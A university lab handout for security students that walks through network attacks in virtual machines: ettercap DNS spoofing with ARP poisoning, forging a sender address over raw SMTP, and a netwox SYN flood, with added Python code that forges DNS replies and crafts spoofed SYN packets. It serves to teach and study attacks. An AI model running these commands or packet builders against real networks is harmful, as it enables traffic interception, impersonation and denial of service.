Blossom—Hands-on exercises for computer forensics and security

Copyright: The development of this document is funded by the Higher Education Academy. Permission is granted to copy, distribute and/or modify this document under a license compliant with the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/3.0/.

Network Attacks

BLOSSOM Manchester Metropolitan University (Funded by Higher Education Academy) [email protected]


1. Learning Objectives

This lab aims to understand various network attacks.

2. Preparation

1) Under the Linux environment
2) Some documents that you may need to refer to:

• 'Virtual-MachineGuide.pdf'
• 'Linux-Guide.pdf'
• 'BLOSSOM-UserGuide.pdf'

3. Tasks

Setup & Installation:

• Start two virtual machines as you have done with previous exercises (see Virtual Machine Guide)

# kvm -cdrom /var/tmp/BlossomFiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:57 -net vde -name node-one

# kvm -cdrom /var/tmp/BlossomFiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:58 -net vde -name node-two

Task 1 DNS Spoofing Attack

1.1 DNS spoofing is an attack in which the attacker answers a victim's DNS queries with forged responses, so that a hostname resolves to an address of the attacker's choosing and traffic intended for one website is redirected to another. For this task we will use the network security tool Ettercap. The task also requires a local web server to be running, such as Apache2, to act as the site the victim is redirected to.

1.2 On one of the virtual machines, install apache2 and ettercap, and then take note of the IP address of the machine. Apache2 serves its default web page on the loopback address (127.0.0.1); the same page can also be reached from any other virtual machine on the virtual network via the machine's own IP address.

1.3 Now with the web server up and running, ettercap reads its spoofing rules from a DNS file, which must be edited using the following command:

#gedit /usr/share/ettercap/etter.dns

In this file, delete everything and save the following single line, with the IP address noted in 1.2 in place of the placeholder:

* A <IP address of the Apache2 machine>

The wildcard (*) matches any hostname, so any website address entered into a browser will be answered with the IP address supplied (A is the record type for an IPv4 address).

1.4 With the spoofed DNS entry now present, the ettercap tool can be started to initiate the DNS spoofing attack, which is performed using the following command:

#ettercap -T -q -P dns_spoof -M arp // //

-T selects the text-based interface; -q runs in quiet mode so that captured packets are not printed to the screen; -P dns_spoof loads the dns_spoof plugin, which answers intercepted DNS queries according to the rules in etter.dns; -M arp starts a man-in-the-middle ARP poisoning attack so that packets between the hosts pass through the attacking machine; and the two // // arguments are the two target groups with every field left empty, i.e. every host on the network. ARP poisoning only works against hosts on the same local network segment as the attacker, which is why both virtual machines sit on the same vde network.

1.5 After the command has been started successfully, we can now use the other virtual machine to attempt to access a web site. Whatever web address is typed into the browser, it should be redirected to the Apache2 default web page.

1.6 Whilst ettercap is running, every web site accessed from the victim virtual machine should resolve to the impersonating host rather than the intended web server; ettercap's text interface reports each spoofed answer as it is sent.

Question: How would you go about only spoofing 'www.google.com' to redirect to the Apache2 local host that we created?
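To show what the dns_spoof rule actually produces on the wire, here is an added example (not code from the handout or from Ettercap) that forges the DNS answer for a captured query in the way a rule such as "* A 10.0.2.15" does: the transaction ID and question are copied from the query, the response bit and authoritative bit are set, and a single A record pointing at the attacker-chosen address is appended. It only builds packets as bytes, so it runs offline and without root; the interception itself, which ettercap obtains through ARP poisoning, is not reproduced. The address 10.0.2.15, the rule list and the sample query are assumed values.

```python
"""Forge a DNS A answer for a query, as Ettercap's dns_spoof plugin does for
etter.dns rules. Added example: builds bytes only, no sockets. 10.0.2.15 and
the rules below are assumed values."""
import fnmatch
import socket
import struct

QTYPE_A = 1
QCLASS_IN = 1

# etter.dns-style rules: (hostname pattern, spoofed IPv4). Assumed values.
RULES = [("*", "10.0.2.15")]


def encode_name(name):
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += struct.pack("B", len(raw)) + raw
    return out + b"\x00"


def decode_name(data, offset):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels, jumped, end = [], False, offset
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                     # compression pointer
            pointer = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        offset += 1
        if length == 0:
            if not jumped:
                end = offset
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), end


def build_query(txid, name, qtype=QTYPE_A):
    """Constructed recursive query, as a stub resolver would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def match_rule(name, rules):
    """Spoofed IP for the first rule matching name ('*' wildcards), or None."""
    for pattern, ip in rules:
        if fnmatch.fnmatchcase(name.lower(), pattern.lower()):
            return ip
    return None


def spoof_response(query, rules=RULES, ttl=3600):
    """Forged answer for `query`, or None if no rule applies."""
    txid, flags = struct.unpack("!HH", query[:4])
    if flags & 0x8000 or struct.unpack("!H", query[4:6])[0] != 1:
        return None                               # a response, or odd query
    name, off = decode_name(query, 12)
    qtype, qclass = struct.unpack("!HH", query[off:off + 4])
    if qtype != QTYPE_A or qclass != QCLASS_IN:
        return None                               # only A/IN rules exist
    ip = match_rule(name, rules)
    if ip is None:
        return None
    question = query[12:off + 4]                  # echoed verbatim
    rflags = 0x8480 | (flags & 0x0100)            # QR, AA, RA; RD copied
    header = struct.pack("!HHHHHH", txid, rflags, 1, 1, 0, 0)
    rdata = socket.inet_aton(ip)
    answer = (struct.pack("!H", 0xC00C)           # pointer to question name
              + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata))
              + rdata)
    return header + question + answer


def answered_ip(response):
    """IPv4 address carried in the first answer of a response built above."""
    _, off = decode_name(response, 12)
    off += 4                                      # skip qtype/qclass
    _, off = decode_name(response, off)
    rdlen = struct.unpack("!HHIH", response[off:off + 10])[3]
    return socket.inet_ntoa(response[off + 10:off + 10 + rdlen])


if __name__ == "__main__":
    q = build_query(0x1234, "www.google.com")
    print("www.google.com ->", answered_ip(spoof_response(q)))
```

The victim's resolver accepts the forged packet because it arrives first and carries the matching transaction ID and question; that is the whole trick, and it only works because the attacker, via the ARP poison, sees the query before the real server's reply can arrive.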

Task 2 Email Spoofing

2.1 We can now take a look at one way in which email spoofing can be performed. Email spoofing is when an email is sent with the sender address and other parts of the email header altered so that it appears to have originated from a different source.

2.2 Following the installations (this task uses the alpine mail client and the sendmail server), create two users on the virtual machine that will function as the sending and receiving parties respectively:

#adduser alice
#adduser bob

2.3 After creating both users, we can now send a legitimate email from one user to the other. Log in to alice and then open alpine.

#su alice
#alpine

2.4 In the main window, press E to bypass the first screen, then press C to access the ‘Compose Message’ option. Send an email to bob@localhost with a subject title and some message text.

After you finish writing a basic email, press CTRL+X to send the message and then Q to quit alpine.

2.5 Now log in to bob’s account and open alpine so that we can read the legitimate email in his inbox:

#su bob
#alpine

Again, press E to skip the first screen and then press Enter twice to view the inbox and read the first message. There should be an email from 'alice@localhost'. Exit alpine as before by pressing Q.

2.6 Open another terminal window and type the following command:

#telnet localhost 25

This connects us to the sendmail server, which listens on the default SMTP port 25. SMTP does not authenticate the sender here: the address given in MAIL FROM is simply whatever the client claims. Type in the following lines once the telnet connection is open (the line after DATA is a header, the blank line separates the headers from the body, and a line containing only a full stop ends the message):

HELO localdomain
MAIL FROM: alice@localhost
RCPT TO: bob@localhost
DATA
Subject: Spoofed Email

Random Content
.
QUIT
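The dialogue above as both sides see it, as an added example that is not part of the handout and is not sendmail: the lines typed over telnet are fed to a minimal in-memory SMTP server, and the message the recipient ends up with is then inspected. The server replies follow RFC 5321; the headers the toy server prepends (a Received: line recording the HELO name and the connecting address, and a From: line copied from MAIL FROM when the client sent none, which is what sendmail does too) are simplified. The host name, peer address and timestamp are constructed.

```python
"""Simulated SMTP spoofing session: client lines from the exercise fed to a
toy MTA. Added example; not sendmail. Replies per RFC 5321, headers
simplified, host name/peer address/timestamp constructed."""


class ToyMTA:
    """Just enough of the SMTP state machine to accept one message."""

    def __init__(self, hostname="node-one", peer_ip="127.0.0.1"):
        self.hostname, self.peer_ip = hostname, peer_ip
        self.helo = self.envelope_from = None
        self.rcpts, self.body, self.delivered = [], [], []
        self.in_data = False

    def greet(self):
        return f"220 {self.hostname} ESMTP ready"

    def handle(self, line):
        """Process one client line; return the reply (None while inside DATA)."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                self.delivered.append((self.envelope_from, list(self.rcpts),
                                       self._stamp() + "\n".join(self.body) + "\n"))
                self.body = []
                return "250 2.0.0 message accepted for delivery"
            # Dot-stuffing: a line starting ".." carries a literal leading "."
            self.body.append(line[1:] if line.startswith("..") else line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.helo = arg.strip()
            return f"250 {self.hostname} Hello {self.helo} [{self.peer_ip}]"
        if verb == "MAIL":
            # The envelope sender is whatever the client claims; nothing checks it.
            self.envelope_from = arg.split(":", 1)[1].strip().strip("<>")
            return "250 2.1.0 sender ok"
        if verb == "RCPT":
            self.rcpts.append(arg.split(":", 1)[1].strip().strip("<>"))
            return "250 2.1.5 recipient ok"
        if verb == "DATA":
            if not (self.envelope_from and self.rcpts):
                return "503 5.5.1 need MAIL and RCPT first"
            self.in_data = True
            return '354 enter mail, end with "." on a line by itself'
        if verb == "QUIT":
            return f"221 2.0.0 {self.hostname} closing connection"
        return "500 5.5.1 command unrecognized"

    def _stamp(self):
        """Headers the MTA prepends. Received: records the HELO name and the
        real peer address, which is what gives the spoof away on inspection."""
        head = self.body[:self.body.index("")] if "" in self.body else self.body
        stamp = (f"Received: from {self.helo} ([{self.peer_ip}])\n"
                 f"\tby {self.hostname} with SMTP; Mon, 1 Jan 2024 00:00:00 +0000\n")
        if not any(h.lower().startswith("from:") for h in head):
            stamp += f"From: {self.envelope_from}\n"   # taken from MAIL FROM
        return stamp


def run_session(client_lines, **mta_kwargs):
    """Return the (side, text) transcript and the list of delivered messages."""
    mta = ToyMTA(**mta_kwargs)
    transcript = [("S", mta.greet())]
    for line in client_lines:
        transcript.append(("C", line))
        reply = mta.handle(line)
        if reply is not None:
            transcript.append(("S", reply))
    return transcript, mta.delivered


def header(msg, name):
    """Value of the first header `name` in a raw message (folded lines joined)."""
    head = msg.split("\n\n", 1)[0].replace("\n\t", " ")
    for line in head.split("\n"):
        if line.lower().startswith(name.lower() + ":"):
            return line.split(":", 1)[1].strip()
    return None


# The dialogue typed over telnet in the exercise (constructed copy).
SPOOF_SESSION = ["HELO localdomain", "MAIL FROM: alice@localhost",
                 "RCPT TO: bob@localhost", "DATA", "Subject: Spoofed Email",
                 "", "Random Content", ".", "QUIT"]

if __name__ == "__main__":
    transcript, delivered = run_session(SPOOF_SESSION)
    for side, text in transcript:
        print(f"{side}: {text}")
    print("--- as delivered to bob ---")
    print(delivered[0][2])
```

Run it to see the numbered replies the telnet session produces and the delivered message: the From: header reads alice@localhost exactly as in the legitimate mail, while the Received: line still records the HELO name and the address the connection actually came from.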

Now go back to bob's mailbox and compare the addresses the two emails appear to be sent from: they should be identical. Only the Received: headers that sendmail adds, which record how each message was submitted, differ between the two, and that is where an investigator would look.

Task 3 Netwag / Netwox

3.1 Netwox is a command line network toolbox that provides many different possibilities for network attacks; Netwag is the graphical front end to Netwox.

http://www.cis.syr.edu/~wedu/Teaching/cis758/netw522/netwox-doc_html/html/examples.html

The above document contains some useful information and examples regarding Netwox.

3.2 In order to perform a SYN Flood using Netwox, the following command can be used:

#netwox 76 -i 10.0.2.17 -p 80

76 selects the netwox SYN flood tool, -i gives the destination IP address (replace 10.0.2.17 with the address of the target virtual machine), and -p the destination port. A SYN flood sends a stream of TCP SYN segments whose handshakes are never completed, so the target accumulates half-open connections until it can no longer accept legitimate ones. Netwox has a significant number of other network attack capabilities at its disposal.
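To make concrete what a SYN flood puts on the wire, here is an added example (not code from the handout and not netwox's own) that constructs the raw IPv4/TCP SYN segments such a flood consists of, with correct IP and TCP checksums, each from a different spoofed source address so that the SYN-ACKs go nowhere and the half-open entries linger on the target. It only builds bytes, so it runs offline and without root; transmitting them would need a raw socket and CAP_NET_RAW. The target 10.0.2.17:80 is the handout's value; the source addresses are randomly chosen, assumed values.

```python
"""Craft the IPv4/TCP SYN segments of a SYN flood (what netwox 76 sends).
Added example; builds bytes only, no raw socket. Target 10.0.2.17:80 from the
handout; spoofed sources are random assumed values."""
import random
import socket
import struct


def checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (odd length padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_syn(src_ip, src_port, dst_ip, dst_port, seq=None, ip_id=None):
    """Return ip_header + tcp_header for a SYN with no payload."""
    seq = random.getrandbits(32) if seq is None else seq
    ip_id = random.getrandbits(16) if ip_id is None else ip_id
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    # TCP: ports, seq, ack=0, data offset 5 words, flags=SYN, window, cksum, urg
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, seq, 0,
                      5 << 4, 0x02, 64240, 0, 0)
    # TCP checksum covers a pseudo-header of the IP addresses, protocol, length
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    # IPv4: ver/ihl, tos, total length, id, DF flag, ttl 64, proto TCP, cksum
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), ip_id, 0x4000,
                     64, socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def random_source():
    """Spoofed source that does not exist on the lab network, so the SYN-ACK
    is never answered; avoids the lab's 10.0.0.0/8, loopback and multicast."""
    first = random.randint(1, 223)
    while first in (10, 127):
        first = random.randint(1, 223)
    return "%d.%d.%d.%d" % (first, random.randint(0, 255),
                            random.randint(0, 255), random.randint(1, 254))


def flood_batch(dst_ip, dst_port, count):
    """`count` SYNs for the target, each from a fresh spoofed source/port."""
    return [build_syn(random_source(), random.randint(1024, 65535),
                      dst_ip, dst_port) for _ in range(count)]


def verify(packet):
    """Recompute both checksums as a receiver would (a bad one means the
    segment is silently dropped). Returns (ip_ok, tcp_ok, tcp_flags)."""
    ip_ok = checksum(packet[:20]) == 0
    src, dst, tcp = packet[12:16], packet[16:20], packet[20:]
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp))
    return ip_ok, checksum(pseudo + tcp) == 0, tcp[13]


if __name__ == "__main__":
    for pkt in flood_batch("10.0.2.17", 80, 3):
        print(socket.inet_ntoa(pkt[12:16]), "->",
              socket.inet_ntoa(pkt[16:20]), verify(pkt))
```

The checksum detail matters in practice: a flood whose TCP checksums are wrong is discarded by the target's stack before any connection state is allocated, so the attack has no effect. The same crafting code, with the source address set to a real host on the segment, is also the basis of the ARP and other spoofing tools in the Netwox toolbox.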

Question/Task: Using Netwox, perform an ARP Poisoning attack on the 2nd virtual machine.